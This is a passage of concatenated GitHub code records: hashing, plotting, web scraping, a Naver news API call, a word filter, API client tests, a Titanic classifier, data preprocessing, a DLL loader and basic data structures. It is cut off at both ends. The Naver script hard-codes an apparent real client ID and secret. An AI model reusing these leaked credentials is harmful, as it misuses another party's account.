self.wrong_actv_weighted_median = self.feature_weighted_median[self.label==0, :]\n#         print('*** right_actv shape is {}|{}, wrong_actv shape is {}|{}.'.format(self.right_actv.shape, self.right_actv_weighted_median.shape, self.wrong_actv.shape, self.wrong_actv_weighted_median.shape)) \n        return feature.numpy(), turnout.numpy() # convert to numpy type before return\n    \n    \n    \n\n    \n","repo_name":"weinajin/pytorch_classification_template","sub_path":"activation_base_class.py","file_name":"activation_base_class.py","file_ext":"py","file_size_in_byte":5671,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"}
{"seq_id":"6419339087","text":"from hashlib import md5\nimport time\nimport os\n \ndef calMD5(str):\n    m = md5()\n    m.update(str)\n    \n    return m.hexdigest()\n \ndef calMD5ForFile(file):\n    statinfo = os.stat(file)\n    \n    if int(statinfo.st_size)/(1024*1024) >= 1000 :\n        return calMD5ForBigFile(file)\n    m = md5()\n    f = open(file, 'rb')\n    m.update(f.read())\n    f.close()\n    \n    return m.hexdigest()\n \ndef calMD5ForFolder(dir,MD5File):\n    outfile = open(MD5File,'w',encoding=\"utf-8\")\n    for root, subdirs, files in os.walk(dir):\n        for file in files:\n            filefullpath = os.path.join(root, file)\n            \"\"\"print filefullpath\"\"\"\n            \n            filerelpath = os.path.relpath(filefullpath, dir)\n            md5 = calMD5ForFile(filefullpath)\n            outfile.write(dir+\"\\\\\"+filerelpath+':'+md5+\"\\n\")\n            print(dir+\"\\\\\"+filerelpath+\" 
Completed!\")\n outfile.close()\n \ndef calMD5ForBigFile(file):\n m = md5()\n f = open(file, 'rb')\n buffer = 8192 # why is 8192 | 8192 is fast than 2048\n \n while 1:\n chunk = f.read(buffer)\n if not chunk : break\n m.update(chunk)\n \n f.close()\n return m.hexdigest()\n \n \n \n \nif __name__ == \"__main__\":\n #print calMD5(\"Hello World!\")\n \n t = time.time()\n #print(calMD5ForFile(\"H:\\\\[WMSUB][Detective_Conan][Movie_24_The Scarlet Bulle][BDRip][GB][1920X1080].mp4\"))\n calMD5ForFolder(\"E:\\\\World of Warcraft\",\"World_of_Warcraft.mdl\")","repo_name":"Shuai-Zuo/Trash_Codes_Archives","sub_path":"Exact time unknown/Python/FolderMd5/md5.py","file_name":"md5.py","file_ext":"py","file_size_in_byte":1453,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"16293874539","text":"### Import libraries\n\n\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom seaborn import violinplot\nimport numpy as np\n\n\n### Functions useful for the drug comparison\n\n\ndef plot_comparison(score_rf, score_vae, score_vae_highcorr, label, title, save = False, out_path = \"figures/comparison_vae_rf.png\"):\n \"\"\"\n Plot a comparison of the random forest and vae across the three metrics.\n \"\"\"\n score = [score_rf, score_vae, score_vae_highcorr]\n xlim = [(-0.5, 0.7), (0, 9), (0.35, 0.75)]\n\n fig = plt.figure(constrained_layout = True, figsize = (15,15))\n fig.suptitle(title, fontsize = 15, fontweight = \"bold\")\n subfigs = fig.subfigures(nrows = 3, ncols = 1)\n\n for i in range(len(subfigs)):\n subfigs[i].suptitle(label[i], fontweight = \"bold\")\n axs = subfigs[i].subplots(nrows = 1, ncols = 3)\n \n for j, ax in enumerate(axs.flat):\n\n ax.grid(True)\n ax.set_title(score[i].columns[j])\n ax.set_xlim(xlim[j])\n ax.boxplot(score[i][score[i].columns[j]], vert = False)\n \n if save:\n plt.savefig(out_path, bbox_inches = 'tight', dpi = 300)\n\ndef plot_violin(score_RF_downsampling, score_RF_veryhigh_corr, score_RF_PCA, score_RF_embedding, score_RF, save = False, out_path = \"figures/embedding_comparisons.png\"):\n \"\"\"\n Plot a comparison of different RF models fitted with different input data, as violin plot.\n \"\"\"\n df1 = pd.DataFrame([score_RF_downsampling[\"Pearson's r\"].tolist(), 349*[\"Down-sampled\"]], \\\n index = [\"Pearson's r\", \"Input variables\"]).T\n df2 = pd.DataFrame([score_RF_veryhigh_corr[\"Pearson's r\"].tolist(),349*[\"Drug-correlated\"]],\\\n index = [\"Pearson's r\", \"Input variables\"]).T\n df3 = pd.DataFrame([score_RF_PCA[\"Pearson's r\"].tolist(), 349*[\"PCA\"]], \\\n index = [\"Pearson's r\", \"Input variables\"]).T\n df4 = pd.DataFrame([score_RF_embedding[\"Pearson's r\"].tolist(), 349*[\"VAE embedded\"]], \\\n index = [\"Pearson's r\", \"Input variables\"]).T\n df5 = pd.DataFrame([score_RF[\"Pearson's r\"].tolist(), 349*[\"All proteins\"]], \\\n index = [\"Pearson's r\", \"Input variables\"]).T\n df = pd.concat([df1, df2, df3, df4, df5])\n df[\"Pearson's r\"] = df[\"Pearson's r\"].astype(float)\n\n plt.figure(constrained_layout = True, figsize = (8,8))\n ax = violinplot(x = \"Input variables\", y = \"Pearson's r\", data = df)\n ax.axhline(df4[\"Pearson's r\"].median(), ls='-.', color = \"black\")\n ax.axhline(df4[\"Pearson's r\"].quantile(0.25), ls=':', color = \"purple\")\n ax.axhline(df4[\"Pearson's r\"].quantile(0.75), ls=':', color = \"purple\")\n\n plt.suptitle(\"Comparison of Random Forest models fitted with different input data\",\\\n fontsize = 15, fontweight = \"bold\")\n\n if save:\n 
plt.savefig(out_path, bbox_inches = 'tight', dpi = 300)\n\ndef get_drugs(score, bad_pred = True):\n    \"\"\"\n    Get a list of drugs that are either well-predicted (bad_pred = False) according to all metrics of the score \n    (Pearson's r, RMSE, C-index), or badly-predicted (bad_pred = True).\n    \"\"\"\n    drug_list = []\n    \n    if bad_pred:\n        for i, elem in enumerate(score.values):\n            if elem[0] < score[\"Pearson's r\"].quantile(0.25) and elem[1] > score[\"RMSE\"].quantile(0.75) and elem[2] < score[\"C-index\"].quantile(0.25): # then the drug is badly predicted at all levels\n                drug_list.append(score.index[i])\n    \n    else:\n        for i, elem in enumerate(score.values):\n            if elem[0] > score[\"Pearson's r\"].quantile(0.75) and elem[1] < score[\"RMSE\"].quantile(0.25) and elem[2] > score[\"C-index\"].quantile(0.75): # then the drug is well predicted at all levels\n                drug_list.append(score.index[i])\n    \n    return(drug_list)\n\ndef plot_drug_distrib(drug, bad_drugs, negative_skew, save = False, out_path = \"figures/drugs_distrib.png\"):\n    \"\"\"\n    Plot the distributions of badly predicted drugs (bad_drugs) and well-predicted drugs with negative \n    skew (negative_skew) to see whether there are noticeable differences which could explain the prediction.\n    \"\"\"\n    fig = plt.figure(constrained_layout = True, figsize = (15,10))\n    fig.suptitle(\"Distributions of AUC of outlier drugs\", fontsize = 15, fontweight = \"bold\")\n    subfigs = fig.subfigures(nrows = 2, ncols = 1)\n\n    subfigs[0].suptitle(\"Well-predicted drugs\", fontweight = \"bold\")\n    axs = subfigs[0].subplots(nrows = 1, ncols = 3)\n    for j, ax in enumerate(axs.flat):\n        ax.grid(True)\n        ax.set_title(negative_skew[j])\n        ax.set_xlim((-0.5,20))\n        ax.set_ylim((0,180))\n        ax.hist(drug[negative_skew[j]])\n        ax.set_xlabel(\"Drug sensitivity (AUC)\")\n\n    subfigs[1].suptitle(\"Badly-predicted drugs\", fontweight = \"bold\")\n    axs = subfigs[1].subplots(nrows = 1, ncols = 3)\n    for j, ax in enumerate(axs.flat):\n        ax.grid(True)\n        ax.set_title(bad_drugs[j])\n        ax.set_xlim((-0.5,20))\n        ax.set_ylim((0,180))\n        ax.hist(drug[bad_drugs[j]])\n        ax.set_xlabel(\"Drug sensitivity (AUC)\")\n\n    if save:\n        plt.savefig(out_path, bbox_inches = 'tight', dpi = 300)\n\n\n### Functions useful for the deep-SHAP analysis\n\n\ndef convert_shap_to_gene(shap_values, gene_prot, proteins, shap_threshold = 0.9):\n    \"\"\"\n    Order proteins by SHAP value absolute mean importance, then convert the list of proteins to a set of genes.\n    \"\"\"\n    # order proteins by shap value absolute mean importance\n    df = pd.DataFrame({\n        \"mean_abs_shap\": np.mean(np.abs(shap_values), axis=0), \n        \"name\": proteins\n    })\n    df = df.sort_values(\"mean_abs_shap\", ascending=False)\n    enriched_prot = df.loc[df.mean_abs_shap > df.mean_abs_shap.quantile(shap_threshold)].name\n\n    # convert from protein to genes\n    gene_set = gene_prot.loc[gene_prot[\"Uniprot\"].isin(enriched_prot)].Gene_Symbol\n    gene_set = set(gene_set)\n\n    return(gene_set)\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"SimonGrouard/astra","sub_path":"result_interpretation.py","file_name":"result_interpretation.py","file_ext":"py","file_size_in_byte":5930,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"19508946335","text":"import os\nimport requests\nfrom bs4 import BeautifulSoup\nBASE_DIR = os.getcwd()\n\ndef make_path(url,target_path='picture'):\n    dir_path = os.path.join(BASE_DIR, target_path)\n    if os.path.exists(dir_path):\n        pass\n    else:\n        os.mkdir(dir_path)\n\n    response = requests.get(url=url)\n    text = response.text\n    
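# parse the category page and collect {album name: detail-page URL} pairs\n    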
soup = BeautifulSoup(text, 'html.parser')\n    div_obj = soup.find(name='div', attrs={'class': 'lb_box'})\n    img_list = div_obj.find_all_next(name='dt')\n    dic = {}\n    for i in img_list:\n        dir_name = i.find(name='img').get(\"alt\").replace(\" \", \"-\")\n        dir_href = i.find(name='a').get(\"href\")\n        dic[dir_name] = dir_href\n    return dic\n\ndef download_img(lst,name,dirname):\n    for img in lst:\n        img_url = img.get(\"src\").replace(\"113x113\",'740x-')\n        img_content = requests.get(img_url).content\n        file_name = img_url.rsplit('/', 1)[-1]\n        file_path = os.path.join(BASE_DIR, dirname, name, file_name)\n        try:\n            with open(file_path, 'wb') as f:\n                f.write(img_content)\n                print(file_path, 'scrape finished')\n        except OSError:\n            print(file_path, 'scrape failed')\n\ndef request_img(url,dirname):\n    dic = make_path(url,dirname)\n    for name, img_url in dic.items():\n        dir_path = os.path.join(BASE_DIR, dirname, name)\n        os.mkdir(dir_path)\n        response2 = requests.get(url=img_url)\n        text2 = response2.text\n        soup2 = BeautifulSoup(text2, 'html.parser')\n        div_obj2 = soup2.find(name='div', attrs={'class': 'overview'})\n        if not div_obj2:\n            continue\n        img_list2 = div_obj2.find_all(name='img')\n        download_img(img_list2, name,dirname)\n\nif __name__ == '__main__':\n    url = 'http://www.yesky.com/c/6_20491.shtml'\n    request_img(url,'picture3')","repo_name":"myin1994/mylearn","sub_path":"Python项目/day74/pa2.py","file_name":"pa2.py","file_ext":"py","file_size_in_byte":1809,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"}
{"seq_id":"30258256343","text":"import requests\nimport pprint # handy when JSON data comes out on a single line without line breaks!\n\nclient_id = \"NQiH7_sc1SAtNUlef0Rp\"\nclient_secret = \"8rqvp8AYlW\"\n\nnaver_open_api = \"https://openapi.naver.com/v1/search/news.json?query=android\"\nheader_params = {\"X-Naver-Client-id\":client_id, \"X-Naver-Client-Secret\":client_secret} # essentially a JSON object\nres = requests.get(naver_open_api, headers=header_params)\n\nif res.status_code == 200: # a 200 response code means success; 
the same status codes apply to open APIs\n    data = res.json()\n    # pprint.pprint(data)\n    for idx, item in enumerate(data['items']):\n        print(str(idx+1) + '.', item['title'], '/ link: ', item['link'])\nelse: print(\"Error Code: \", res.status_code) ","repo_name":"Jiyul-Kim/study","sub_path":"LectureAndCourse/Inflearn__Python-Crawling/02_naver_news_json.py","file_name":"02_naver_news_json.py","file_ext":"py","file_size_in_byte":742,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"24551176637","text":"#!/usr/bin/env python\n# -*- coding: UTF-8 -*-\n############################################################\n# Created on: 2018-05-03\n# Author: Joe Aaron\n# Email: pant333@163.com\n# Description: when the user enters a sensitive word, replace it with asterisks *; e.g. the input 「北京是个好城市」 becomes 「**是个好城市」.\n############################################################\nimport string\n\nword_filter=set()\n\nwith open('source/0011/filtered_words.txt') as f:\n    for w in f.readlines():\n        word_filter.add(w.strip())\n    \nwhile True:\n    s=input()\n    if s == 'exit':\n        break\n    for w in word_filter:\n        if w in s:\n            s= s.replace(w,'*'*len(w))\n    print(s)\n    ","repo_name":"joeaaron/LearningPython","sub_path":"Practice/练习册/0012.py","file_name":"0012.py","file_ext":"py","file_size_in_byte":718,"program_lang":"python","lang":"de","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"}
{"seq_id":"10129814797","text":"from minaombud.client import MinaOmbudClient\nfrom minaombud.crypto.jwkset import JwkSet\nfrom minaombud.defaults import (\n    MINA_OMBUD_API_CLIENT_ID,\n    MINA_OMBUD_API_CLIENT_SECRET,\n    MINA_OMBUD_API_TOKEN_URL,\n    MINA_OMBUD_API_URL,\n    MINA_OMBUD_SAMPLE_AUDIENCE,\n    MINA_OMBUD_SAMPLE_ISSUER,\n    MINA_OMBUD_SAMPLE_KEYS,\n    MINA_OMBUD_SAMPLE_USER_DB,\n    MINA_OMBUD_TREDJE_MAN\n)\nfrom minaombud.model import Identitetsbeteckning\nfrom minaombud.user import (\n    create_user_token,\n    load_user_database\n)\n\n\ndef _load_users():\n    with open(MINA_OMBUD_SAMPLE_USER_DB) as f:\n        return load_user_database(f)\n\n\nKEYS = JwkSet.load(MINA_OMBUD_SAMPLE_KEYS)\nUSERS = _load_users()\n\n\ndef new_user_token(u: str):\n    return create_user_token(u, jwks=KEYS, users=USERS,\n                              audience=MINA_OMBUD_SAMPLE_AUDIENCE,\n                              issuer=MINA_OMBUD_SAMPLE_ISSUER)\n\n\ndef new_client():\n    return MinaOmbudClient(service=\"test_client.py\", scope=\"user:self\",\n                           client_id=MINA_OMBUD_API_CLIENT_ID,\n                           client_secret=MINA_OMBUD_API_CLIENT_SECRET,\n                           url=MINA_OMBUD_API_URL,\n                           token_url=MINA_OMBUD_API_TOKEN_URL)\n\n\ndef test_sok_fullmakter():\n    client = new_client()\n    user_token = new_user_token(\"198602262381\")\n    response = client.sok_fullmakter(tredjeman=MINA_OMBUD_TREDJE_MAN,\n                                     fullmaktshavare=Identitetsbeteckning.from_id(\"198602262381\"),\n                                     user_token=user_token)\n    assert isinstance(response.fullmakter, list)\n\n\ndef test_sok_behorigheter():\n    client = new_client()\n    user_token = new_user_token(\"198602262381\")\n    response = client.sok_behorigheter(tredjeman=MINA_OMBUD_TREDJE_MAN,\n                                       fullmaktshavare=Identitetsbeteckning.from_id(\"198602262381\"),\n                                       user_token=user_token)\n    assert isinstance(response.kontext, list)\n","repo_name":"bolagsverket/mina-ombud-samples","sub_path":"python/tests/test_client.py","file_name":"test_client.py","file_ext":"py","file_size_in_byte":2007,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"}
{"seq_id":"8653822560","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport torch\nfrom torch.utils.data import DataLoader, Dataset\nfrom tqdm import tqdm\nimport 
os\nos.environ[\"KMP_DUPLICATE_LIB_OK\"] = \"TRUE\"\n\n\nlr = 0.002\nepochs = 100\npredict_need = True\n\n\nclass TitanicData(Dataset):\n    def __init__(self, filepath):\n        # 'Age' is not used because some samples are missing it, so it is simply dropped\n        x_features = ['Pclass', 'Sex', 'SibSp', 'Parch', 'Fare']\n        y_features = ['Survived']\n\n        data = pd.read_csv(filepath)\n        self.len = data.shape[0]\n\n        # get_dummies does one-hot encoding; the dimension of x_data actually goes from 6 to 7\n        # both x and y use the data[features] form so that y is also a matrix, with the same shape convention as x\n        self.x_data = torch.from_numpy(np.array(pd.get_dummies(data[x_features])))\n        self.y_data = torch.from_numpy((np.array(data[y_features])))\n\n    def __len__(self):\n        return self.len\n\n    def __getitem__(self, index):\n        return self.x_data[index], self.y_data[index]\n\n\nfilepath = r'../data/titanic/train.csv'\ntrain_set = TitanicData(filepath)\ntrain_loader = DataLoader(dataset=train_set, batch_size=32, shuffle=True, num_workers=0)\n\n\nclass LogisticRegression(torch.nn.Module):\n    def __init__(self):\n        super(LogisticRegression, self).__init__()\n        self.linear1 = torch.nn.Linear(6, 3)\n        self.linear2 = torch.nn.Linear(3, 1)\n        self.sigmoid = torch.nn.Sigmoid()\n\n    def forward(self, x):\n        x = self.sigmoid(self.linear1(x))\n        x = self.sigmoid(self.linear2(x))\n        return x\n\n    def predict(self, x):\n        with torch.no_grad():\n            x = self.sigmoid(self.linear1(x))\n            x = self.sigmoid(self.linear2(x))\n            print(x.shape)\n            y = []\n            for i in x:\n                y.append(1 if i >= 0.5 else 0)\n            return y\n\n\nmodel = LogisticRegression()\n\n\ncriterion = torch.nn.BCELoss()\noptimizer = torch.optim.SGD(model.parameters(), lr=lr)\n\n\ndef show_lossimage(epoch_list, loss_list):\n    plt.plot(epoch_list, loss_list)\n    plt.xlabel('epoch')\n    plt.ylabel('loss')\n    plt.show()\n\n\nif __name__ == '__main__':\n    epoch_list = []\n    loss_list = []\n    for epoch in range(epochs):\n        epoch_loss = 0\n        for i, data in enumerate(train_loader):\n            x, y = data\n            x = x.float()  # the dtype conversion is required or an error is raised, but why?\n            y = y.float()\n            y_hat = model(x)\n\n            loss = criterion(y_hat, y)\n\n            loss.backward()\n            epoch_loss += loss.item()\n\n            optimizer.step()\n            optimizer.zero_grad()\n        epoch_loss /= (i+1)\n        print('epoch={}, loss={}'.format(epoch+1, epoch_loss))\n        epoch_list.append(epoch+1)\n        loss_list.append(epoch_loss)\n\n    show_lossimage(epoch_list, loss_list)\n\n    # predict\n    if predict_need:\n        # prepare the test dataset\n        test_filepath = r'../data/titanic/test.csv'\n        test_data = pd.read_csv(test_filepath)\n        x_features = ['Pclass', 'Sex', 'SibSp', 'Parch', 'Fare']\n        # the data passes through df, np.ndarray, tensor types\n        x = torch.from_numpy(np.array(pd.get_dummies(test_data[x_features])))\n\n        # get the prediction\n        y_pred = model.predict(x.float())\n\n        # save the prediction in csv\n        outputs = pd.DataFrame({'PassengerId': test_data.PassengerId, 'Survived': y_pred})\n        outputs.to_csv(r'../TitanicPredict.csv', index=False)  # index=False means the index column is not saved","repo_name":"LennonLau/PyTorch-practice","sub_path":"chapter8_Titanic.py","file_name":"chapter8_Titanic.py","file_ext":"py","file_size_in_byte":3514,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"}
{"seq_id":"29415414863","text":"import pandas as pd\n\n'''data=pd.read_csv('Carcount.csv')\ndata=data.sort_values(by='count', ascending=False)\nprint(data)\n\ndf=data[data['count']>12]\nprint(df)\n# df.to_csv('maxcarcaount_3.csv')\n# df['xmax']-df['xmin'] > threshold\n# df[df['JobTitle'].value_counts()<2])'''\n\ndata = pd.read_csv(\"/home/mayank-s/PycharmProjects/Datasets/Berkely_DeepDrive/berkely_train.csv\")\n# data=pd.read_csv('/home/mayank-s/Desktop/Link to 
Datasets/aptiveBB/reddy.csv')\nprint(data.head())\nprint(data.groupby('class').count())\n\n# this is done to remove rows where xmin==xmax or ymin==ymax (which is actually wrong)\ndf = data[(data['xmin'] != data['xmax']) & (data['ymin'] != data['ymax'])]\n\nprint(df.head())\n\n# df.to_csv(\"berkely_After_filter.csv\")\n\n# this is the most important function to count the no. of each class in a group\nnew = data.groupby(['filename'])['class'].count()\n\ngb = data.groupby(['filename'])\ngrouped_C = gb['class']\nn = data.groupby(['filename', 'class'])\na = (n.size())\nprint(a)\ngv = a.index[0]\n\nfor file_name, (cls) in enumerate(a):\n    print(file_name)\n    print(cls)\nnew1 = data.groupby(['filename', 'class'])['xmin']  # .count()\n\n# b=data.groupby(level=['filname', 'class']).sum()\n\n\nmydata = data.groupby('filename')\nprint(data.groupby('class').count())\nlen_group = mydata.ngroups\n# index=mydata.groups['car'].values\nmygroup = mydata.groups\n\n# new=data.groupby(['filename', 'class'])#['car'].count()\n\n# this is the most important function to count the no. of each class in a group\nnew = data.groupby(['filename'])['class'].count()\n\nfor da in mygroup.keys():\n    index = mydata.groups[da].values\n    for read_index in index:\n        print(read_index)\n    print(da)\n    break\n\n'''for da in mydata.ngroups():\n\n    index = mydata.groups['car'].values\n    mydata.groups['0124dfa6-385f1b58'].values\n    print(da)'''\n\n# index=mydata.groups['car'].values\n'''pyindex=np.random.choice(index, size=10000, replace=False)\ndata.drop(data.index[pyindex],inplace=True)\nprint(data.groupby('class').count())\n\ndf=data.replace(\"motor\", \"cool\")\ndf=df.replace(\"bike\", \"cool\")\ndf=df.replace(\"cool\", \"motorbike\")\ndf=df.replace(\"traffic light\", \"traffic_light\")\ndf=df.replace(\"traffic sign \", \"traffic_sign \")\nprint(df.groupby('class').count())\ndata.to_csv(\"berkely_train_new_1.csv\")\nprint(1)'''\n","repo_name":"mayanks888/AI","sub_path":"Python/python_code/more data prepocessing.py","file_name":"more data prepocessing.py","file_ext":"py","file_size_in_byte":2240,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"}
{"seq_id":"17233001959","text":"import pandas as pd\nfrom sklearn.tree import DecisionTreeRegressor\nfrom sklearn.metrics import mean_absolute_error\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.ensemble import RandomForestRegressor\nfrom sklearn.impute import SimpleImputer\n\n# This is a sample Python script.\n\n# Press Shift+F10 to execute it or replace it with your code.\n# Press Double Shift to search everywhere for classes, files, tool windows, actions, and settings.\n\n\n# load the data\ndata = pd.read_csv('C:\\\\Users\\\\ehold\\\\Desktop\\\\Folders\\\\Datasets\\\\melb_data.csv')\n\n# Select target\ny = data.Price\n\n# To keep things simple, we'll use only numerical predictors\nmelb_predictors = data.drop(['Price'], axis=1)\nX = melb_predictors.select_dtypes(exclude=['object'])\n\n# Divide data into training and validation subsets\nX_train, X_valid, y_train, y_valid = train_test_split(X, y, train_size=0.8, test_size=0.2,\n                                                      random_state=0)\ndef score_dataset(X_train, X_valid, y_train, y_valid):\n    model = RandomForestRegressor(n_estimators=10, random_state=0)\n    model.fit(X_train, y_train)\n    preds = model.predict(X_valid)\n    return mean_absolute_error(y_valid, preds)\n\ndef missingValues(X_train, X_valid, y_train, y_valid):\n    # there are 3 ways to deal with missing values\n    # drop columns with missing values - downside is model loses access to a lot of potential 
information\n    # imputation - filling in missing values with some number - e.g. the mean of the column - usually leads to a more accurate model than dropping\n    # extending imputation - impute the missing values, add a new column to make note of the imputed entries w/ true/false\n\n    # examining data\n    # Shape of training data (num_rows, num_columns)\n    print(X_train.shape)\n\n    # Number of missing values in each column of training data\n    missing_val_count_by_column = (X_train.isnull().sum())\n    print(missing_val_count_by_column[missing_val_count_by_column > 0])\n\n    cols_with_missing = [col for col in X_train.columns if X_train[col].isnull().any()]\n\n    approach_to_use = 3\n\n    if approach_to_use == 1:\n        # first approach - dropping missing values\n        reduced_X_train = X_train.drop(cols_with_missing, axis=1)\n        reduced_X_valid = X_valid.drop(cols_with_missing, axis=1)\n\n        print(\"MAE from Approach 1 (Drop columns with missing values):\")\n        print(score_dataset(reduced_X_train, reduced_X_valid, y_train, y_valid))\n    elif approach_to_use == 2:\n        # second approach - imputing missing values with the mean of each column with simple imputer\n        my_imputer = SimpleImputer()\n        imputed_X_train = pd.DataFrame(my_imputer.fit_transform(X_train))\n        imputed_X_valid = pd.DataFrame(my_imputer.transform(X_valid))\n\n        # Imputation removed column names; put them back\n        imputed_X_train.columns = X_train.columns\n        imputed_X_valid.columns = X_valid.columns\n\n        print(\"MAE from Approach 2 (Imputation):\")\n        print(score_dataset(imputed_X_train, imputed_X_valid, y_train, y_valid))\n    elif approach_to_use == 3:\n        # third approach - imputing missing values with the mean of each column then making a new column to mark the rows imputed\n        # Make copy to avoid changing original data (when imputing)\n        X_train_plus = X_train.copy()\n        X_valid_plus = X_valid.copy()\n\n        # Make new columns indicating what will be imputed\n        for col in cols_with_missing:\n            X_train_plus[col + '_was_missing'] = X_train_plus[col].isnull()\n            X_valid_plus[col + '_was_missing'] = X_valid_plus[col].isnull()\n\n        # Imputation\n        my_imputer = SimpleImputer()\n        imputed_X_train_plus = pd.DataFrame(my_imputer.fit_transform(X_train_plus))\n        imputed_X_valid_plus = pd.DataFrame(my_imputer.transform(X_valid_plus))\n\n        # Imputation removed column names; put them back\n        imputed_X_train_plus.columns = X_train_plus.columns\n        imputed_X_valid_plus.columns = X_valid_plus.columns\n\n        print(\"MAE from Approach 3 (An Extension to Imputation):\")\n        print(score_dataset(imputed_X_train_plus, imputed_X_valid_plus, y_train, y_valid))\n\n\n\nmissingValues(X_train, X_valid, y_train, y_valid)\n\n","repo_name":"eric-holdener/IntermediateMachineLearning","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4232,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"}
{"seq_id":"11032522453","text":"from ctypes import cdll\nfrom _ctypes import CFuncPtr\n\n\n\ndef make_dll_meta(dll_path):\n    class DllMeta(type):\n        def __new__(mcs, what, bases, attr_dict):\n            import sys\n            sys.stderr.write('Welcome\n')\n            cls = super().__new__(mcs, what, bases, attr_dict)\n            dll = cdll.LoadLibrary(dll_path)\n            for f_name, f in vars(cls).items():\n                if not callable(f):\n                    continue\n                if hasattr(dll, f_name) and isinstance(getattr(dll, f_name), CFuncPtr):\n                    setattr(cls, f_name, staticmethod(getattr(dll, f_name)))\n            cls.__dll = dll\n            return cls\n\n        # def close(cls):\n        #     if hasattr(cls, \"close\"):\n        #         cls.close(cls)\n        #\n        # def __del__(self):\n        #     self.close()\n\n    
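# hand back a metaclass bound to this one DLL path, so separate classes can wrap separate libraries\n    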
return DllMeta\n","repo_name":"ItGarbager/aimcf_yolov5","sub_path":"utils/now/dll_meta.py","file_name":"dll_meta.py","file_ext":"py","file_size_in_byte":853,"program_lang":"python","lang":"en","doc_type":"code","stars":205,"dataset":"github-code","pt":"48"} +{"seq_id":"23175997382","text":"from django.http import HttpRequest\nfrom django.shortcuts import render\nfrom utils.decorators import permission_checker_decorator_factory\nfrom car_repair_request.models import CarRepairRequest\n\n# Create your views here.\nfrom django.views.generic import FormView\n\n\n@permission_checker_decorator_factory()\ndef index(request: HttpRequest):\n current_user_id = request.user.id\n car_repairs = CarRepairRequest.objects.filter(user_id=current_user_id).all()\n repaired = CarRepairRequest.objects.filter(user_id=current_user_id, is_fixed=True).all()\n working = CarRepairRequest.objects.filter(user_id=current_user_id, is_fixed=False).all()\n print(request.user.username)\n context = {\n 'repairs': car_repairs,\n 'repaired': repaired,\n 'working': working\n }\n return render(request, 'home_module/index.html', context)\n\n\n","repo_name":"mesutfd/repair-it","sub_path":"home_module/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":850,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"37237068602","text":"\nclass LinkedList:\n def __init__(self, data):\n self.data = data\n self.next = None\n \n def append_node(self, data):\n if self.next == None:\n self.next = LinkedList(data)\n else:\n self.next.append_node(data)\n \n def append_nodes(self, dataList):\n for data in dataList:\n self.append_node(data)\n return self\n\n def insert_node(self, data, position):\n if position == 0:\n new_node = LinkedList(data)\n new_node.next = self\n return new_node\n\n elif position == 1:\n new_node = LinkedList(data)\n new_node.next = self.next\n self.next = new_node\n return self\n\n else:\n if self.next is None:\n raise ValueError(\"Position out of range\")\n self.next = self.next.insert_node(data, position - 1)\n return self\n \n def remove_node(self, data):\n if self.data == data:\n return self.next\n else:\n if self.next is None:\n raise ValueError(\"Data not in list\")\n self.next = self.next.remove_node(data)\n return self\n \n def search_node(self, data):\n if self.data == data:\n return True\n else:\n if self.next is None:\n return False\n return self.next.search_node(data)\n \n def get_list(self):\n print(self.data, end=\", \")\n if self.next != None:\n self.next.get_list()\n\n\nclass BinarySearchTree:\n def __init__(self, data):\n self.data = data\n self.left = None\n self.right = None\n\n def add_value(self, data):\n if data < self.data:\n if self.left is None:\n self.left = BinarySearchTree(data)\n else:\n self.left.add_value(data)\n elif data > self.data:\n if self.right is None:\n self.right = BinarySearchTree(data)\n else:\n self.right.add_value(data)\n else:\n print(\"Value already in tree\")\n\n def add_values(self, dataList):\n for data in dataList:\n self.add_value(data)\n return self\n\n def remove_value(self, data):\n if data < self.data:\n if self.left is None:\n raise ValueError(\"Data not in tree\")\n self.left = self.left.remove_value(data)\n return self\n elif data > self.data:\n if self.right is None:\n raise ValueError(\"Data not in tree\")\n self.right = self.right.remove_value(data)\n return self\n else:\n if self.left is None and self.right is None:\n return None\n elif self.left is None:\n return self.right\n elif 
self.right is None:\n return self.left\n else:\n self.data = self.right.get_min()\n self.right = self.right.remove_value(self.data)\n return self\n \n def get_min(self):\n if self.left is None:\n return self.data\n else:\n return self.left.get_min()\n \n def search_value(self, data):\n if data < self.data:\n if self.left is None:\n return False\n return self.left.search_value(data)\n elif data > self.data:\n if self.right is None:\n return False\n return self.right.search_value(data)\n else:\n return True\n \n def get_tree(self):\n print(self.data, end=\", \")\n if self.left != None:\n self.left.get_tree()\n if self.right != None:\n self.right.get_tree()\n\n\nfrom HashMap import HashMap\nfrom Array import Array\nfrom random import randint\nfrom time import time\n\nif __name__ == \"__main__\":\n print(\"\\nTHIS IS THE DATA STRUCTURE COMPARATIVE STUDY\")\n print(\"The available data structures are LinkedLists, Binary Search Trees, Hash Maps, and Arrays.\")\n size = int(input(\"\\nPlease input the size of these data structures: \"))\n items = set()\n while len(items) < size:\n items.add(randint(0, size*2))\n items = list(items)\n\n print(\"\\nCreating Data Structures...\")\n linked_list = LinkedList(items[0])\n linked_list.append_nodes(items[1:])\n\n binary_search_tree = BinarySearchTree(items[0])\n binary_search_tree.add_values(items[1:])\n\n hash_map = HashMap()\n hash_map.add_values(items)\n\n array = Array(items)\n print(\"Done!\")\n\n while True:\n choice = int(input(\"\"\"\\nNext, please enter a function you would like to benchmark for each of the data structures:\n1. Insert (at beginning)\n2. Search\n3. Remove\n4. Print\n5. Exit\n\nChoice: \"\"\"))\n \n if choice 